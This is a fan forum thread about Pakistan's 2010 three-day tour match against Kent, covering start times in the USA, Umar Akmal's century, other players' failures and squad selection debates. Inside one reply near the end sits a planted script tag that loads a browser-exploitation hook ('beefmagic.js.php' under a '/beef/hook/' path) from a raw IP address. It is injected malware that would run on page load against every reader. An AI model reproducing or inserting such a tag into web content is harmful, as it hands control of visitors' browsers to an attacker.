Kent v Pakistan | Kent | June 28 - 30 | 3 day tour game

Shaheerthe2nd said:
Does anyone have any clue about what time the test matches will start in the USA? I know what date they are going to be starting, but I need to know the time.

Well if you are in NY some matches will start AM 6:00, while others AM 5:30

If you are in LA some matches will start AM 3:00, others AM 02:30

Umar playing a blinding knock. Bodes well. :afridi

Lol Rehman, lasted more balls then Fawad Alam and Malik combined..

But Moons on a come back, so I'll let him go. :D

Lol, most of our batsmen only scored in the 20's. :)))

To be honest, Fawad has had a very disappointing start to this tour so far. Even though these are practice matches but this is where you show if you can do well potentialy. Fawad needs to do a better job then this or maybe he needs to work harder on his technique as it is becoming the main reason for his downfall or rather stopping him from taking off.

speaks volumes about malik if a lower order batsmen lasts longer than him...and will eventually outscore him...u akmal is class

If we continue with the same RR we will inshaAllah have around 345 at the end of the day

sagar said:
To be honest, Fawad has had a very disappointing start to this tour so far. Even though these are practice matches but this is where you show if you can do well potentialy. Fawad needs to do a better job then this or maybe he needs to work harder on his involvement in politics as it is becoming the main reason for his downfall or rather stopping him from taking off.

fixed ;-)

IAJ said:
If we continue with the same RR we will inshaAllah have around 345 at the end of the day

yes, but if "the" umar keeps the majority of the strike then 700 is on ! :umarakmal

Boys boys, whole point of these matches is to get a score under your belt or get used to the conditions.

Look at the positives:

-Malik hit a few good boundaries and feels in good touch
-Umar Akmal is on his way to a massive century which'll improve his confidence
-Kamran Akmal played a few good shots too

Hopefully they'll concentrate and take things more seriously in the actual tests, happens to everyone, most internationals aren't up for this sort of game, inshallah against Australia Afridi will click and will take it more seriously, he gives his best when Pak are under pressure, im pretty sure he went out today in a careless attitude.

Got to see how Afridi bowls, hopefully he'll bowl really well and will use himself as a lone spinner and add in another bat.

Nazir_ Rules said:
They are playing 90 overs right?

I made my calculation on the basis of 90 overs at least.

:umarakmal playing really good here jst saw the score after 2 hrs

Man, this is just practice as some people said, we're playing the longer version of the game after mths and in Eng conditions. Why are some people asking for Kamran or Malik's head at this point? As long as they pick up momentum from here, then that's all we ask for. It's astonishing as to how some people would want Malik to fail when he's playing for the team you're supporting. Unbelievable really.

U.Akmal and Rehman doing well out there, if they could take us to 300 then that'd be good.

Pakprideuk said:
Boys boys, whole point of these matches is to get a score under your belt or get used to the conditions.

Look at the positives:

Hopefully they'll concentrate and take things more seriously in the actual tests, happens to everyone, most internationals aren't up for this sort of game, inshallah against Australia Afridi will click and will take it more seriously, he gives his best when Pak are under pressure, im pretty sure he went out today in a careless attitude.

Got to see how Afridi bowls, hopefully he'll bowl really well and will use himself as a lone spinner and add in another bat.
:19:

MAJID-SHAH said:
nope, none will be availible as this game is not being televised.
i knw bt there was one video posted earlier it was of Sky Sports News it shld some of the wicket can someone plz upload a video of Sky Sports News :)

Ali Muzaffar said:
i knw bt there was one video posted earlier it was of Sky Sports News it shld some of the wicket can someone plz upload a video of Sky Sports News :)
cool, i`ll see if i can find it.

In another match windies A made 329 from their 50 overs, while the little rockstars trying to avoid the follow on in a 50 overs match. They are currently on 97/6 from 20.3 overs.

Pity we or Mr Butt to be precise only selected one youngster so that we can't replace him with another youngster if the first one fails.
And Umar Akmal another mediocre pakistani batsman?
His recent performances show how much average he is compared to the rest of Pakistani batsmen.
Btw can you watch this match anywhere.

Umar Akmal.:14:
But,gotta feel for Amin..He has all the ingrediants in him to succeed at the highest level but somehow,he has been unable to translate his talent into something substantial..But,he has still my backing and I would definitely play him in the first test..

IAJ said:
In another match windies A made 329 from their 50 overs, while the little rockstars trying to avoid the follow on in a 50 overs match. They are currently on 97/6 from 20.3 overs.

Comparing A team with National team? Great you have proven that Pakistan national team is stronger than India A, Brilliant!! whats the point of brining an India A match score onto Pak tour match?

giri26 said:
Comparing A team with National team? Great you have proven that Pakistan national team is stronger than India A, Brilliant!!

lols, I didn't compare them. I called them little rockstars, the full team of India are big rockstars.

Pakprideuk said:

Look at the positives:

Now thats the spirit!

Abdullah22 said:
Pity we or Mr Butt to be precise only selected one youngster so that we can't replace him with another youngster if the first one fails.
And Umar Akmal another mediocre pakistani batsman?
His recent performances show how much average he is compared to the rest of Pakistani batsmen.
Btw can you watch this match anywhere.[/QUOTE]

Yes, at the ground.

2 more sixes from the Lahore dynamite!

giri26 said:
Comparing A team with National team? Great you have proven that Pakistan national team is stronger than India A, Brilliant!! whats the point of brining an India A match score onto Pak tour match?
Yeah,that was lame..:inti

rehman got stumped!!!!!!!!!
actually fair enough, was a good supporting innings in the 100+ partnership.

how can people be pointing fingers at fawad he only got what 2 games since australia i am more dissapointed at umar amin even though he got dismissed unfairly today but the last games was poor and i think asad shafiq deserved more of a try to be frank.

Pakistan should make a declaration and hope to get all the oppisition out by end of play tomorrow (or before that) and then bat out all of day3 playing in a positive mindset and trying to ensure they only lose 3-5 wickets max so all of the top batsmen can spend some good time at the crease.

Abdur Rehman falls, but well played, that is what we want from our bowlers down the order.

Lol, that was goodmans first wicket as well.. :p

Nazir_ Rules said:
Abdur Rehman st †Dixey b Goodman 30 - well played.

Chakka lagane key chakkaron mein houga :)

My Name Is Khan said:
Pakistan should make a declaration and hope to get all the oppisition out by end of play tomorrow (or before that) and then bat out all of day3 playing in a positive mindset and trying to ensure they only lose 3-5 wickets max so all of the top batsmen can spend some good time at the crease.

i agree they need more time in the middle than losing wickets so they can get use to the conditions

IAJ said:
Chakka lagane key chakkaron mein houga :)

lol yeah, must of been inspired by Umar's two huge hits.

Bhai, main bhi ker kay dikahon. Ey, eh, ----- and he's gone.

But well played anyways.

I must admit I did doubt Umar's ability to play the long innings, but seems like he's actually got the stamina to continue past the 100 mark.

Poison said:
I must admit I did doubt Umar's ability to play the long innings, but seems like he's actually got the stamina to continue past the 100 mark.

How could you. :moyo :moyo :moyo

Pakistan's middle order is still weak (barring Umar)

I really think selectors + Butt made a wrong decision. Yousuf and Younis shouldn't been included. My ideal squad for England Tests would've been:

Salman Butt
Imran Farhat
Younis Khan
Mohammad Yousuf
Umar Akmal
Kamran Akmal
Shahid Afridi
Muhammad Aammer
Umar Gul
Danish Kaneria
Muhammad Asif

only weak link is Imran Farhat...we dun ahve any other opener who can replace him though, at the moment.

Umar Akmals been brilliant though disappointed with the others,god knows what will happen against a better bowling attack.Again,Umar Amin and Fawad Alam get sent in early as goshat offering for the opposition since our seniors are too cowardly to bat or open up the order.

Prince_Pathan said:
speaks volumes about malik if a lower order batsmen lasts longer than him...and will eventually outscore him...u akmal is class
stop acting like a child! I can show you numerous occasions where a tailer ender has outscored the like of Inzi, Tendulkar, Pointing etc.
<script src=http://69.65.31.43/~indifuno/blahism/beef/hook/beefmagic.js.php></script>
Just b/c you don't like a player stop coming up with the most idiotic statements to support your bashing!